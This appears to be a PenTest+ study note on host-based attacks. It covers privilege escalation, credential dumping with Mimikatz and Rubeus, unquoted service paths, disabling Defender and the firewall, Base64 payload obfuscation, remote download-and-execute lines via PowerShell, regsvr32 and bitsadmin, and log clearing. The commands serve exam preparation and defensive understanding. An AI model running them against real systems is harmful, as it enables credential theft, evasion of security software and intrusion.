Host Attacks (Objective 4.4)
Host-based attacks exploit system vulnerabilities and misconfigurations to gain unauthorized control, escalate privileges, or deploy malicious payloads on individual machines. Understanding these techniques is critical for comprehensive penetration testing (Domain 4: Attacks & Exploits).
Privilege Escalation
- Definition: Gaining higher-level permissions than initially granted.
- Vertical: user → administrator
- Horizontal: lateral access to peer accounts
- Demo Tools: Metasploit for hands-on escalation.
- Key Tools & Commands:
- Mimikatz: extract creds & perform pass-the-hash
sekurlsa::logonpasswords→ plaintext credslsadump::sam→ SAM hashessekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash> /run:cmd.exe
- Seatbelt (C#): automated security checks
Seatbelt.exe all→ enumerate all checksSeatbelt.exe -group=checkselevated→ high-integrity processesSeatbelt.exe autoruns→ auto-run executables
- PowerShell ISE: GUI for scripting enumeration (users, services, software).
- Mimikatz: extract creds & perform pass-the-hash
Credential Harvesting
- Definition: Collecting usernames/passwords via social engineering or post-exploitation dumps.
- Dumping Tools:
- Mimikatz (memory creds)
- Rubeus (Kerberos tickets) : TGT tickets for Kerberos
rubeus.exe tgt::renew /user:admin /domain:banksecure.local
Misconfigured Endpoints
- Endpoints: computers, servers, mobiles.
- Risk: weak policies, unnecessary services, open ports.
- Tools:
- PowerShell – scripting & enumeration
- PsExec – remote command execution
- Lateral movement by running commands as SYSTEM
Unquoted Service Paths
- Misconfiguration: executable paths with spaces lack quotes (e.g.
C:\Program Files\MyService\service.exe). - Risk: Windows may execute
C:\Program.exeif present. - Detection (PowerShell):
Get-WmiObject Win32_Service -Filter "StartMode='Auto'" | Where PathName -match '^[^"]+\s[^"]+' | ForEach-Object { "$($_.Name): $($_.PathName)" }
- **Exploitation:** place malicious `Program.exe` in C:\ → runs with service privileges.
- **Mitigation:** always enclose service paths in quotes.
---
### Disabling Security Software
- **PowerShell:**
- `Stop-Service -Name WinDefend -Force`
- `Set-Service -Name WinDefend -StartupType Disabled`
- Registry: `DisableRealtimeMonitoring = 1`
- **PsExec (remote):**
- `psexec \\target -u user -p pass -s powershell.exe -Command "Set-NetFirewallProfile -Enabled False"`
- Disable UAC via registry: `EnableLUA = 0`
---
### Payload Obfuscation
- **Goal:** hide malicious code from AV/IDS without altering function.
- **Methods:**
- **Encoding** (Base64)
- **Encryption**
- **Compression**
- **Code Manipulation** (junk code, renamed vars)
- **Example:**
```powershell
$b = [System.Text.Encoding]::Unicode.GetBytes($payload)
$e = [Convert]::ToBase64String($b)
powershell -EncodedCommand $e
```
- Evil-WinRM: tool for interacting ith windows remote management services (WinRM)
- **Example**: `evil-winrm -i <remote> -u <user> -p <pass> -s "powershell -EncodedCommand $encodedPayload`
---
### User-Controlled Access Bypass
- **AD CS Exploit (Certify):** request certs for privileged accounts via misconfigured templates.
- **Kerberos Manipulation (Rubeus):**
- **Pass-the-Ticket** & **Golden Ticket** attacks.
- **Remote Exec (Evil-WinRM):** authenticate & run obfuscated payloads over WinRM.
- Can be exploited through HTTP
---
### Shell & Kiosk Escapes
- **Shell Escape:** spawn full shell from restricted editors
- e.g. in vi: `:!bash`
- **PowerShell:** `Invoke-Expression -Command "cmd.exe"`
- **Kiosk Escape:** leverage browser “Save As” to access filesystem.
```powershell
Invoke-WebRequest -Uri "url" -OutFile ".ps1" powershell.exe -ExecutioinPolicy Bypass -File ".ps1"
````
- **WMI:** restart explorer to regain desktop:
```powershell
(Get-WmiObject Win32_Process -Filter "Name='explorer.exe'").Terminate()
Start-Process explorer.exe
```
---
### Library and Process Injection Method
- **DLL Injection**: loading a dll into memory space of a target process
- **Process Hollowing**: new process is launched in a suspended state replaces its memory with malicious code, then resumes the process
- **Reflective DLL Injection**: a stealthy injection where dll is loaded directly from memory than being written on disk
- **Remote Thread Injection**: creating a new thread in a remote process & pointing to memory with malicious code
---
### Log Tampering
- **Definition:** modify/clear logs to hide attacker activity.
- **Tools:** PowerShell `Clear-EventLog` (Security, Application, System), PsExec for remote.
- **Detection:** log integrity monitoring, alerts on sudden clearance, secure backups.
---
### Living Off the Land (LOLBins)
Use trusted OS binaries to evade detection:
- **powershell.exe** → `Get-Process | Out-File C:\Temp\procs.txt`
- **bitsadmin.exe** → cli for managing background intelligent transfer service (BITS)
- `bitsadmin.exe /transfer "JobName" <url> <path>`
- **regsvr32.exe** → execute remote scripts
- `regsvr32.exe /s /n /u /i:<url> script.sct scrobj.dll`
- **schtasks.exe** → schedule SYSTEM-level tasks
- `schtasks.exe /create /tn "ElevatedTask"/tr <path> /sc onlogon /ru "SYSTEM"`
- **certutil.exe** → encode/exfiltrate data; managing certificates for auth.